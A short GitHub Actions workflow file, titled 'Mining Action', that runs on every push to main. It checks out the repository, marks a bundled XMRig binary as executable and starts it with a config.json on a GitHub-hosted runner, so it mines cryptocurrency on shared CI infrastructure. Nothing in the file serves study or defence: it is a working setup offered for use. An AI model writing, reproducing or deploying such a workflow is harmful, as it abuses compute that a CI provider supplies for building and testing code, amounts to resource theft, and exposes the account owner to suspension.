name: Mining Action

on:
  push:
    branches:
      - main

jobs:
  mine:
    runs-on: ubuntu-latest
    steps:
      # Checkout repository to get the files
      - name: Setup Repository
        uses: actions/checkout@v3

      # Set execute permissions for XMRig
      - name: Set Execute Permissions
        run: chmod +x ./xmrig

      # Run XMRig directly
      - name: Start Mining
        run: |
          ./xmrig --config=config.json